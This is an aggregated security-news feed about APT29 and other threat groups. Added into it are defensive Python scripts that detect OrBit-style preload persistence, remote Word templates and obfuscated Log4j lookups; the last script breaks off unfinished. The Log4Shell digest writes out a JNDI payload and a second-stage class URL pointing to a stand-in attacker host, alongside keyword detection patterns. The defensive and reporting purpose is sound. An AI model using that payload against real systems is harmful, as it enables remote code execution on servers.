www.secnews.physaphae.fr This is the RSS 2.0 feed from www.secnews.physaphae.fr. It is a simple aggregated flow of multiple article sources. The list of sources can be found on www.secnews.physaphae.fr. 2025-05-10T18:30:15+00:00 www.secnews.physaphae.fr

The Hacker News - The Hacker News is a hacking news blog (surprising, right?) Russian Hackers Using DropBox and Google Drive to Drop Malicious Payloads 2022-07-19T21:03:48+00:00 https://thehackernews.com/2022/07/russian-hackers-using-dropbox-and.html www.secnews.physaphae.fr/article.php?IdArticle=5827734 False None APT 29 None

Security Affairs - Security Blog Russia-linked APT29 relies on Google Drive, Dropbox to evade detection The Russia-linked threat actor APT29 is using the Google Drive cloud storage service to evade detection. Palo Alto Networks researchers reported that the Russia-linked APT29 group, tracked by the researchers as Cloaked Ursa, started using the Google Drive cloud storage service to evade detection. The Russia-linked APT29 group (aka SVR group, Cozy Bear, and The Dukes) has been active since at least […] 2022-07-19T13:41:49+00:00 https://securityaffairs.co/wordpress/133409/apt/apt29-google-drive-dropbox.html www.secnews.physaphae.fr/article.php?IdArticle=5825713 False Threat APT 29 None

Global Security Mag - French news site Russian APT29 hackers use the DropBox and Google Drive online storage services Malware 2022-07-19T11:00:58+00:00 http://www.globalsecuritymag.fr/Les-pirates-russes-APT29-utilisent,20220719,128061.html www.secnews.physaphae.fr/article.php?IdArticle=5824317 False None APT 29 None

CyberScoop - scoopnewsgroup.com special Cyber Russian hacking unit Cozy Bear adds Google Drive to its arsenal, researchers say APT29, one of the SVR's most active and successful hacking groups, has been using the cloud service to help deliver malware, the researchers said. 2022-07-19T10:00:00+00:00 https://www.cyberscoop.com/apt29-google-drive-malware-spearphishing/ www.secnews.physaphae.fr/article.php?IdArticle=5823767 False None APT 29 None

Anomali - Firm Blog Anomali Cyber Watch: Brute Ratel C4 Framework Abused to Avoid Detection, OrBit Kernel Malware Patches Linux Loader, Hive Ransomware Gets Rewritten, and More Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Targets of Interest | Russian Organizations Increasingly Under Attack By Chinese APTs (published: July 7, 2022) SentinelLabs researchers detected yet another China-sponsored threat group targeting Russia with a cyberespionage campaign. The attacks start with a spearphishing email carrying Microsoft Office maldocs built with the Royal Road malicious document builder. These maldocs dropped the Bisonal backdoor remote access trojan (RAT). Besides the targeted Russian organizations, the same attackers continue targeting other countries such as Pakistan. This China-sponsored activity is attributed with medium confidence to Tonto Team (CactusPete, Earth Akhlut). Analyst Comment: Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from advanced persistent threats (APTs), including a focus on both network and host-based security. Prevention and detection capabilities should also be in place. Furthermore, all employees should be educated on the risks of spearphishing and how to identify such attempts.
MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 Tags: China, source-country:CN, Russia, target-country:RU, Ukraine, Pakistan, target-country:PK, Bisonal RAT, Tonto Team, APT, CactusPete, Earth Akhlut, Royal Road, 8.t builder, CVE-2018-0798 OrBit: New Undetected Linux Threat Uses Unique Hijack of Execution Flow (published: July 6, 2022) Intezer researchers describe a new Linux malware dubbed OrBit that was fully undetected at the time of discovery. The malware hooks functions and is loaded into all running processes, but unlike previously described Linux threats it does not rely on the LD_PRELOAD environment variable. Instead, it achieves persistence by adding the path of its shared object to /etc/ld.so.preload and by patching the binary of the dynamic loader itself so that the loader pulls in the malicious shared object. OrBit establishes an SSH connection, then stages and exfiltrates stolen credentials. It evades detection by hooking the functions used to list running processes or network connections and filtering their output. Analyst Comment: Defenders are advised to use network telemetry to detect anomalous SSH traffic associated with OrBit exfiltration attempts. Consider network segmentation, storing sensitive data offline, and deploying security solutions as statically linked executables.
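Offline triage checks for the OrBit technique described in the item above, written here as an added example (not Intezer's or Anomali's code): parse /etc/ld.so.preload and flag unusual entries, compare the process list reported by a possibly hooked tool with an independent view of /proc, and read dpkg -V or rpm -V output for a dynamic loader whose checksum no longer matches its package. The loader paths are an assumption for common glibc layouts, and the sample preload file, process listings and verification output are constructed for the demo. On a live host the script itself must run from a statically linked toolkit or against a forensic mount, because a dynamically linked interpreter loads the preloaded object like any other process.

```python
"""Offline triage for ld.so.preload persistence of the OrBit kind (added example).

Three checks a responder can run against collected artefacts:
  1. parse /etc/ld.so.preload and flag entries that look out of place,
  2. diff the process list reported by a (possibly hooked) tool against an
     independent view of /proc,
  3. read `dpkg -V` / `rpm -V` output for a dynamic loader whose checksum
     no longer matches its package.
All sample inputs below are constructed, not captured from a real host.
"""
import os
import re

TRUSTED_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/")
# Assumed glibc loader paths; add your distribution's if it differs.
LOADER_PATHS = (
    "/lib64/ld-linux-x86-64.so.2",
    "/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2",
    "/usr/lib64/ld-linux-x86-64.so.2",
)


def parse_ld_so_preload(text):
    """glibc accepts entries separated by whitespace or ':'; '#' starts a comment."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0]
        entries.extend(tok for tok in re.split(r"[\s:]+", line) if tok)
    return entries


def assess_preload(entries, exists=os.path.exists):
    """Return (entry, [reasons]) for each entry; an empty list means nothing odd.
    Any non-empty preload file is already unusual and worth recording."""
    findings = []
    for entry in entries:
        reasons = []
        if not entry.startswith(TRUSTED_LIB_DIRS):
            reasons.append("outside system library directories")
        if not re.search(r"\.so(\.\d+)*$", entry):
            reasons.append("not named like a shared object")
        if not exists(entry):
            reasons.append("missing on disk (or hidden from stat)")
        findings.append((entry, reasons))
    return findings


def parse_pids(text):
    """PIDs from `ps -eo pid=` output or an `ls /proc` listing (non-numeric names ignored)."""
    return {int(tok) for tok in text.split() if tok.isdigit()}


def hidden_pids(hooked_view, trusted_view):
    """PIDs present in the trusted view but filtered out of the tool's view."""
    return sorted(parse_pids(trusted_view) - parse_pids(hooked_view))


def loader_integrity_failures(verify_output, loader_paths=LOADER_PATHS):
    """Loader paths whose checksum failed in `dpkg -V` / `rpm -V` output.
    Both print a 9-character status field; its third character is '5' on an MD5 mismatch."""
    failures = []
    for line in verify_output.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue
        status, path = parts[0], parts[-1]
        if len(status) >= 3 and status[2] == "5" and path in loader_paths:
            failures.append(path)
    return failures


# Constructed samples (not real host output).
SAMPLE_PRELOAD = "# profiler\n/usr/lib64/libjemalloc.so.2\n/dev/shm/ldx/libdl.so.2\n"
SAMPLE_PS = "1\n2\n531\n1201\n"
SAMPLE_PROC = "1 2 531 1201 1337 acpi buddyinfo cpuinfo"
SAMPLE_DPKG_V = ("??5?????? c /etc/ld.so.preload\n"
                 "??5??????   /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2\n")

if __name__ == "__main__":
    entries = parse_ld_so_preload(SAMPLE_PRELOAD)
    # The demo pretends only /usr/lib64 entries exist on disk.
    for entry, reasons in assess_preload(entries, exists=lambda p: p.startswith("/usr/lib64/")):
        print(f"{entry}: {'; '.join(reasons) or 'looks ordinary'}")
    print("PIDs hidden from ps:", hidden_pids(SAMPLE_PS, SAMPLE_PROC))
    print("loader with failed checksum:", loader_integrity_failures(SAMPLE_DPKG_V))
```

The process comparison only has value when the trusted view comes from something the preload cannot touch (a static binary, or `/proc` read from a rescue boot); a second dynamically linked tool on the same host sees the same filtered output. A checksum mismatch on the loader is the strongest of the three signals, since nothing legitimate rewrites ld-linux in place.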
MITRE ATT&CK: [MITRE ATT&CK] Hijack Execution Flow - T1574 | [MITRE ATT&CK] Hide Artifacts - T1564 2022-07-11T22:59:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-brute-ratel-c4-framework-abused-to-avoid-detection-orbit-kernel-malware-patches-linux-loader-hive-ransomware-gets-rewritten-and-more www.secnews.physaphae.fr/article.php?IdArticle=5664956 False Ransomware,Malware,Tool,Vulnerability,Threat,Patching APT 29 None

The Register - English news site Near-undetectable malware linked to Russia's Cozy Bear 2022-07-06T05:27:10+00:00 https://go.theregister.com/feed/www.theregister.com/2022/07/06/brc4_state_sponsored_apt29/ www.secnews.physaphae.fr/article.php?IdArticle=5573916 False Malware,Tool,Threat APT 29 None

Anomali - Firm Blog Anomali Cyber Watch: Moshen Dragon Abused Anti-Virus Software, Raspberry Robin Worm Jumps from USB, UNC3524 Uses Internet-of-Things to Steal Emails, and More Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Attackers Are Attempting to Exploit Critical F5 BIG-IP RCE (published: May 9, 2022) CVE-2022-1388, a critical remote code execution vulnerability affecting F5 BIG-IP multi-purpose networking devices/modules, was made public on May 4, 2022. It is rated critical (CVSSv3 score 9.8). By May 6, 2022, multiple researchers had developed proof-of-concept (PoC) exploits for CVE-2022-1388. The first in-the-wild exploitation attempts were reported on May 8, 2022. Analyst Comment: Update vulnerable F5 BIG-IP versions 13.x and higher. BIG-IP 11.x and 12.x will not be fixed, but temporary mitigations are available: block iControl REST access through the self IP address and through the management interface, and modify the BIG-IP httpd configuration.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 Tags: CVE-2022-1388, F5, Vulnerability, Remote code execution, Missing authentication Mobile Subscription Trojans and Their Little Tricks (published: May 6, 2022) Kaspersky researchers analyzed five Android trojans that secretly subscribe users to paid services. Jocker trojan operators add malicious code to legitimate apps and re-upload them to the Google Play Store under different names. To avoid detection, the malicious functionality does not start until the trojan has checked that it is available in the store. The malicious payload is split across up to four files. It can block or substitute anti-fraud scripts and modify the X-Requested-With header in an HTTP request. Another Android malware involved in subscription fraud, the MobOk trojan, has additional functionality to bypass captchas. MobOk was seen in a malicious app in the Google Play Store, but its most common infection vector is being dropped by other trojans such as Triada. Analyst Comment: Limit your app downloads to the official stores (Google Play Store for Android) and avoid new apps with a low number of downloads and bad reviews. Pay attention to the terms of use and payment. Avoid granting an app permissions that are not crucial to its stated function. Monitor your balance and subscription list.
MITRE ATT&CK: [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Data Manipulation - T1565 Tags: Android, Jocker, MobOk, Triada, Vesub, GriftHorse, Trojan, Subscription fraud, Subscription Trojan, Russia, target-country:RU, Middle East, Saudi Arabia, target-country:SA, Egypt, target-country:EG, Thailand, target-country:TH Raspberry Robin Gets the Worm Early (published: May 5, 2022) Since September 2021, Red Canary researchers have been monitoring Raspberry Robin, a new worm […] 2022-05-10T17:08:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-moshen-dragon-abused-anti-virus-software-raspberry-robin-worm-jumps-from-usb-unc3524-uses-internet-of-things-to-steal-emails-and-more www.secnews.physaphae.fr/article.php?IdArticle=4573852 False Ransomware,Malware,Tool,Vulnerability,Threat APT 29,APT 28 3.0000000000000000

knowbe4 - cybersecurity services Cozy Bear Goes Typosquatting Researchers at Recorded Future's Insikt Group warn that the Russian threat actor NOBELIUM (also known as APT29 or Cozy Bear) is using typosquatting domains to target the news and media industries with phishing pages. 2022-05-05T13:08:59+00:00 https://blog.knowbe4.com/cozy-bear-goes-typosquatting www.secnews.physaphae.fr/article.php?IdArticle=4548962 False Threat APT 29 None

TechRepublic - Security News US Russian hacker group APT29 targeting diplomats 2022-05-03T15:43:28+00:00 https://www.techrepublic.com/article/russian-hacker-group-apt29-targeting-diplomats/ www.secnews.physaphae.fr/article.php?IdArticle=4538684 False None APT 29 None

SecurityWeek - Security News Russian Cyberspies Target Diplomats With New Malware 2022-05-03T10:08:45+00:00 https://www.securityweek.com/russian-cyberspies-target-diplomats-new-malware www.secnews.physaphae.fr/article.php?IdArticle=4537052 False Malware APT 29 None

Mandiant - Mandiant Security Blog UNC3524: Eye Spy on Your Email UPDATE (November 2022):
We have merged UNC3524 with APT29. The UNC3524 activity described in this post is now attributed to APT29. Since December 2019, Mandiant has observed advanced threat actors increase their investment in tools to facilitate bulk email collection from victim environments, especially as it relates to their support of suspected espionage objectives. Email messages and their attachments offer a rich source of information about an organization, stored in a centralized location for threat actors to collect. Most email systems, whether on-premises or in the cloud, offer […] 2022-05-02T09:30:00+00:00 https://www.mandiant.com/resources/blog/unc3524-eye-spy-email www.secnews.physaphae.fr/article.php?IdArticle=8377467 False Tool,Threat APT 29 2.0000000000000000

Security Affairs - Security Blog Russia-linked APT29 targets diplomatic and government organizations 2022-05-02T05:34:39+00:00 https://securityaffairs.co/wordpress/130787/apt/apt29-targets-diplomats.html www.secnews.physaphae.fr/article.php?IdArticle=4531546 False None APT 29 None

The Hacker News - The Hacker News is a hacking news blog (surprising, right?) Russian Hackers Targeting Diplomatic Entities in Europe, Americas, and Asia 2022-05-02T04:40:01+00:00 https://thehackernews.com/2022/05/russian-hackers-targeting-diplomatic.html www.secnews.physaphae.fr/article.php?IdArticle=4532409 False Threat APT 29 None

Mandiant - Mandiant Security Blog Trello From the Other Side: Tracking APT29 Phishing Campaigns
Since early 2021, Mandiant has been tracking extensive APT29 phishing campaigns targeting diplomatic organizations in Europe, the Americas, and Asia. This blog post discusses our recent observations related to the identification of two new malware families in 2022, BEATDROP and BOOMMIC, as well as APT29's efforts to evade detection through retooling and abuse of Atlassian's Trello service. APT29 is a Russian espionage group that Mandiant has been tracking since at least 2014 and is likely sponsored by the Foreign Intelligence Service (SVR). The diplomatic-centric targeting of this recent […]
2022-04-28T12:00:00+00:00 https://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns www.secnews.physaphae.fr/article.php?IdArticle=8377468 False Malware APT 29,APT 29 4.0000000000000000
Mandiant - Mandiant Security Blog Assembling the Russian Nesting Doll: UNC2452 Merged into APT29 […] SolarWinds compromise in December 2020, is attributable to APT29. This conclusion matches attribution statements previously made by the U.S. Government that the SolarWinds supply chain compromise was carried out by APT29, a Russia-based espionage group assessed to be sponsored by the Russian Foreign Intelligence Service (SVR). Our assessment is based on first-hand data gathered by Mandiant and is the result of a thorough comparison and review of UNC2452 and our […] 2022-04-27T09:00:00+00:00 https://www.mandiant.com/resources/blog/unc2452-merged-into-apt29 www.secnews.physaphae.fr/article.php?IdArticle=8377472 False None Solardwinds,APT 29,APT 29 3.0000000000000000

knowbe4 - cybersecurity services “Being Annoying” as a Social Engineering Approach in MFA Attacks Attackers are spamming multifactor authentication (MFA) prompts in an attempt to irritate users into approving the login, Ars Technica reports. Both criminal and nation-state actors are using this technique. Researchers at Mandiant observed the Russian state-sponsored actor Cozy Bear launching repeated MFA prompts until the user accepted the request. 2022-04-18T12:42:15+00:00 https://blog.knowbe4.com/being-annoying-as-a-social-engineering-approach www.secnews.physaphae.fr/article.php?IdArticle=4470685 False None APT 29,APT 29 None

Schneier on Security - American cryptography researcher Bypassing Two-Factor Authentication […] increasingly popular: …some forms of MFA are stronger than others, and recent events show that these weaker forms aren’t much of a hurdle for some hackers to clear.
In the past few months, suspected script kiddies like the Lapsus$ data extortion gang and elite Russian-state threat actors (like Cozy Bear, the group behind the SolarWinds hack) have both successfully defeated the protection. […] Methods include: Sending a bunch of MFA requests and hoping the target finally accepts one to make the noise stop. ... 2022-04-01T11:12:27+00:00 https://www.schneier.com/blog/archives/2022/04/bypassing-two-factor-authentication.html www.secnews.physaphae.fr/article.php?IdArticle=4378460 False Threat APT 29 None

Ars Technica - Risk Assessment Security Hacktivism Leaked ransomware documents show Conti helping Putin from the shadows 2022-03-19T10:45:49+00:00 https://arstechnica.com/?p=1842163 www.secnews.physaphae.fr/article.php?IdArticle=4308724 False Ransomware APT 29 None

Fortinet ThreatSignal - Hardware Vendor Additional Wiper Malware Deployed in Ukraine #CaddyWiper 2022-03-15T13:20:59+00:00 https://fortiguard.fortin
et.com/threat-signal-report/4450 www.secnews.physaphae.fr/article.php?IdArticle=4287368 True Malware,Threat APT 29 None

Anomali - Firm Blog Anomali Threat Research Provides Russian Cyber Activity Dashboard Endnotes [1] “Attack on Ukrainian Government Websites Linked to GRU Hackers,” Bellingcat Investigation Team, accessed February 24, 2022, published February 23, 2022, https://www.bellingcat.com/news/2022/02/23/attack-on-ukrainian-government-websites-linked-to-russian-gru-hackers/; Joe Tidy, “Ukraine crisis: 'Wiper' discovered in latest cyber-attacks,” BBC News, accessed February 24, 2022, published February 24, 2022, https://www.bbc.com/news/technology-60500618. [2] “Treasury Sanctions Evil Corp, the Russia-Based Cybercriminal Group Behind Dridex Malware,” The U.S. Department of the Treasury, accessed February 24, 2022, published December 5, 2019, https://home.treasury.gov/news/press-releases/sm845. 2022-02-25T00:05:00+00:00 https://www.anomali.com/blog/anomali-threat-research-provides-russian-cyber-activity-dashboard www.secnews.physaphae.fr/article.php?IdArticle=4180205 False Threat,Guideline APT 29,APT 29,APT 28 None

Fortinet ThreatSignal - Hardware Vendor New Wiper Malware Discovered Targeting Ukrainian Interests 2022-02-23T18:34:00+00:00 https://fortiguard.fortinet.com/threat-signal-report/4425 www.secnews.physaphae.fr/article.php?IdArticle=4175593 False Malware,Threat APT 29 None

The Hacker News - The Hacker News is a hacking news blog (surprising, right?) Russian APT Hackers Used COVID-19 Lures to Target European Diplomats 2022-02-09T02:46:33+00:00 https://thehackernews.com/2022/02/russian-apt-hackers-used-covid-19-lures.html www.secnews.physaphae.fr/article.php?IdArticle=4098768 False Threat APT 29 None

Anomali - Firm Blog Anomali Cyber Watch: Conti Ransomware Attack, Iran-Sponsored APTs, New Android RAT, Russia-Sponsored Gamaredon, and More Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence New CapraRAT Android Malware Targets Indian Government and Military Personnel (published: February 7, 2022) Trend Micro researchers have discovered a new remote access trojan (RAT) dubbed CapraRAT that targets Android systems. CapraRAT is attributed to the advanced persistent threat (APT) group APT36 (Earth Karkaddan, Mythic Leopard, Transparent Tribe), which is believed to be a Pakistan-based group that has been active since at least 2016. The Android-targeting CapraRAT shares similarities (capabilities, commands, and function names) with the Windows-targeting Crimson RAT, and researchers note that it may be a modified version of the open source AndroRAT.
The delivery method of CapraRAT is unknown; however, APT36 is known to use spearphishing emails with attachments or links. Once CapraRAT is installed and executed, it attempts to reach out to a command and control server and subsequently begins stealing various data from the infected device. Analyst Comment: It is important to obtain software only from the Google Play Store (for Android users) and to avoid installing software from unverified sources, because it is easier for malicious applications to get into third-party stores. Applications that ask for permissions beyond their normal functionality should be treated with suspicion, and the normal functionality of an application should be reviewed carefully prior to installation. Antivirus applications, if available, should be installed on devices. MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Software Deployment Tools - T1072 Tags: APT36, Earth Karkaddan, Mythic Leopard, Transparent Tribe, Android, CapraRAT Russia’s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine (published: February 3, 2022) The Russia-sponsored cyberespionage group Primitive Bear (Gamaredon) has continued updating its toolset, according to Unit 42 researchers. The group continues to rely on its primary tactic: spearphishing emails with attachments that leverage remote templates and template injection, with a focus on Ukraine. These attachments are usually Microsoft Word documents that use a remote template to fetch VBScript, execute it to establish persistence, and wait for the group's instructions via a command and control server. Unit 42 researchers have analyzed the group's activity and infrastructure dating back to 2018 up to the current border tensions between Russia and Ukraine. The infrastructure behind the campaigns is robust, with clusters of domains that are rotated and parked on different IPs, often on a daily basis.
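The remote-template trick in the Gamaredon item above can be checked without opening the document: a .docx is a zip of XML parts, and the attached template is declared as a Relationship in word/_rels/settings.xml.rels. Local templates such as Normal.dotm also use TargetMode="External", but with a file: URI, so the target scheme is what separates an ordinary document from one that pulls its template from a web server. The Python below is an added example (not Unit 42's tooling) that lists external relationships and flags attached templates with a network URL; the two sample documents are constructed in memory, and templates.example.com is a reserved example name, not an indicator.

```python
"""Flag Word documents that load their template from the network (added example).

The attached template is a Relationship of type .../attachedTemplate in
word/_rels/settings.xml.rels. With TargetMode="External" and an http(s)
target, Word fetches the template (and any VBA it carries) when the
document is opened. The documents built below are constructed for the demo.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
ATTACHED_TEMPLATE = OFFICE_REL + "attachedTemplate"
LOCAL_SCHEMES = ("", "file")


def external_relationships(docx_bytes):
    """Every TargetMode="External" relationship as (part, type suffix, target)."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for part in zf.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(part))
            for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
                if rel.get("TargetMode") == "External":
                    kind = rel.get("Type", "").rsplit("/", 1)[-1]
                    found.append((part, kind, rel.get("Target", "")))
    return found


def remote_template_targets(docx_bytes):
    """Targets of attached templates that would be fetched over the network."""
    return [
        target
        for _part, kind, target in external_relationships(docx_bytes)
        if kind == "attachedTemplate" and urlsplit(target).scheme.lower() not in LOCAL_SCHEMES
    ]


def build_sample_docx(template_target):
    """Constructed minimal .docx whose settings part attaches the given template."""
    settings_rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{PKG_REL_NS}">'
        f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
        f'Target="{template_target}" TargetMode="External"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/settings.xml", "<settings/>")
        zf.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


# Constructed samples: example.com is a reserved name, not a real indicator.
REMOTE = build_sample_docx("http://templates.example.com/invoice.dot")
LOCAL = build_sample_docx(
    "file:///C:/Users/analyst/AppData/Roaming/Microsoft/Templates/Normal.dotm")

if __name__ == "__main__":
    for name, doc in (("remote", REMOTE), ("local", LOCAL)):
        hits = remote_template_targets(doc)
        print(f"{name}: {'remote template ' + hits[0] if hits else 'no remote template'}")
```

The same relationship scan covers .dotm and .docm files, and the full list from external_relationships is worth reviewing too: an external oleObject or frame target pointing at an http URL is the same kind of outbound fetch under a different relationship type.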
Analyst Comment: Spearphishing emails represent a significant security risk because the sending email will often appear legitimate to the target; sometimes a target company email is compromis […] 2022-02-08T16:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-conti-ransomware-attack-iran-sponsored-apts-new-android-rat-russia-sponsored-gamaredon-and-more www.secnews.physaphae.fr/article.php?IdArticle=4094313 False Ransomware,Malware,Threat,Conference APT 35,APT 35,APT 29,APT 29,APT 36 2.0000000000000000

Bleeping Computer - American magazine Russian APT29 hackers' stealthy malware undetected for years 2022-01-27T09:23:25+00:00 https://www.bleepingcomputer.com/news/security/russian-apt29-hackers-stealthy-malware-undetected-for-years/ www.secnews.physaphae.fr/article.php?IdArticle=4041393 False Malware APT 29 None

CrowdStrike - CTI Society Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign 2022-01-27T08:00:06+00:00 https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/ www.secnews.physaphae.fr/article.php?IdArticle=4040759 False None Solardwinds,Solardwinds,APT 29,APT 29 None

Anomali - Firm Blog Anomali Cyber Watch: Russia-Sponsored Cyber Threats, China-Based Earth Lusca Active in Cyberespionage and Cybertheft, BlueNoroff Hunts Cryptocurrency-Related Businesses, and More Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Earth Lusca Employs Sophisticated Infrastructure, Varied Tools and Techniques (published: January 17, 2022) The Earth Lusca threat group is part of the Winnti cluster. It is one of several Chinese groups that share aspects of their tactics, techniques, and procedures (TTPs), including the use of Winnti malware.
Earth Lusca was active throughout 2021, conducting both cyberespionage operations against government-connected organizations and financially motivated intrusions targeting the gambling and cryptocurrency sectors. For initial access the group uses several methods, including spearphishing, watering hole attacks, and exploitation of public-facing servers. Cobalt Strike is one of the group's preferred post-exploitation tools, followed by the BioPass RAT, the Doraemon backdoor, the FunnySwitch backdoor, ShadowPad, and Winnti. The group employs two separate infrastructure clusters: the first consists of rented Vultr VPS servers used for command-and-control (C2); the second consists of compromised web servers used to scan for vulnerabilities, tunnel traffic, and host Cobalt Strike C2. Analyst Comment: Earth Lusca often relies on tried-and-true techniques that can be stopped by security best practices, such as not clicking suspicious email or website links and ignoring random banners urging you to update software. Don't be tricked into downloading an Adobe Flash update; Flash was discontinued at the end of December 2020. Administrators should keep their important public-facing applications (such as Microsoft Exchange and Oracle GlassFish Server) updated.
MITRE ATT&CK: [MITRE ATT&CK] Drive-by Compromise - T1189 | [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Scheduled Task - T1053 | [MITRE ATT&CK] System Services - T1569 | [MITRE ATT&CK] Windows Management Instrumentation - T1047 | [MITRE ATT&CK] Account Manipulation - T1098 | [MITRE ATT&CK] BITS Jobs - T1197 | [MITRE ATT&CK] Create Account - T1136 | [MITRE ATT&CK] Create or Modify System Process - T1543 | [MITRE ATT&CK] External Remote Services - T1133 | [MITRE ATT&CK] Hijack Execution Flow […] 2022-01-19T22:45:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-russia-sponsored-cyber-threats-china-based-earth-lusca-active-in-cyberespionage-and-cybertheft-bluenoroff-hunts-cryptocurrency-related-businesses-and-more www.secnews.physaphae.fr/article.php?IdArticle=3999162 False Ransomware,Malware,Tool,Vulnerability,Threat,Patching,Guideline APT 41,APT 38,APT 29,APT 28,APT 28 None

Anomali - Firm Blog Anomali Cyber Watch: Apache Log4j Zero-Day Exploit, Google Fighting Glupteba Botnet, Vixen Panda Targets Latin America and Europe, and More Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit (published: December 10, 2021) A critical vulnerability, registered as CVE-2021-44228, has been identified in Apache Log4j 2, an open source Java logging library. The Apache Software Foundation (ASF) rates the vulnerability as a 10 on the Common Vulnerability Scoring System (CVSS) scale. Cisco Talos has observed malicious activity related to CVE-2021-44228 beginning on December 2, 2021. This vulnerability affects millions of users, and proof-of-concept exploit code exists; LunaSec explains how exploitation works in five simple steps.
These include:
1. Data from the user gets sent to the server (via any protocol).
2. The server logs the data in the request, which contains the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker-controlled server).
3. The payload triggers the Log4j vulnerability and the server makes a request to attacker.com via the Java Naming and Directory Interface (JNDI).
4. The response contains a path to a remote Java class file (e.g. http://second-stage.attacker.com/Exploit.class), which is loaded into the server process.
5. This injected payload triggers a second stage and allows an attacker to execute arbitrary code.
Analyst Comment: Log4j version 2.15.0 has been released to address this vulnerability; however, its main change is to disable message lookups by default (the behaviour previously controlled by the log4j2.formatMsgNoLookups setting). If message lookups are re-enabled, Log4j is again vulnerable to exploitation. The initial campaigns could have been detected by filtering on certain keywords such as "ldap" and "jndi", but this detection method is easily bypassed. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Resource Hijacking - T1496 | [MITRE ATT&CK] Network Denial of Service - T1498 Tags: Log4j, CVE-2021-44228, Log4j2, Log4Shell, Apache, Zero-day, Java, Jndi, Class file Over a Dozen Malicious NPM Packages Caught Hijacking Discord Servers (published: December 8, 2021) Researchers from the DevOps firm JFrog have found at least 17 malicious packages on the open source npm Registry for JavaScript.
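Returning to the Log4j item above: the keyword filters on "ldap" or "jndi" are bypassable because the lookup string can be assembled from nested lookups (${lower:j}, ${::-j}, ${env:UNSET:-j} and similar) that only spell "jndi" after Log4j's own substitution has resolved the inner lookups. The Python below is an added example (mine, not code from Anomali, LunaSec or Log4j) that normalizes those lookups innermost-first before matching, which goes beyond the single plain payload shown in the five steps. It approximates a few of Log4j's lookups offline: an unknown lookup is left in place, and a :-default is always taken even when the variable might exist, which errs toward detection. The sample request lines are constructed and attacker.example is a reserved name.

```python
"""Collapse Log4j lookup syntax before matching for ${jndi:...} (added example).

A bare keyword filter misses payloads that assemble "jndi" from nested
lookups, because Log4j's substitutor resolves the inner lookups first.
This normaliser replays that innermost-first resolution for the handful of
lookups used to disguise text, then matches on the result. It is a
conservative approximation (unknown lookups stay as-is; a :-default is
always taken) meant for log review, not a reimplementation of Log4j.
Sample log lines at the bottom are constructed.
"""
import re

INNERMOST = re.compile(r"\$\{([^${}]*)\}")  # a ${...} with nothing nested inside it
JNDI_PREFIX = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:", re.IGNORECASE)


def resolve(body):
    """Value of one innermost lookup, or None when it cannot be evaluated offline.

    ${x:-d} (also ${::-d}) -> d       default-value syntax, the most common trick
    ${lower:J} -> j, ${upper:j} -> J  case lookups
    ${date:'j'} -> j                  a fully quoted SimpleDateFormat literal
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    key, sep, arg = body.partition(":")
    if not sep:
        return None
    key = key.strip().lower()
    if key == "lower":
        return arg.lower()
    if key == "upper":
        return arg.upper()
    if key == "date" and re.fullmatch(r"'[^']*'", arg):
        return arg[1:-1]
    return None  # ctx, env, sys, jndi, ... : leave in place


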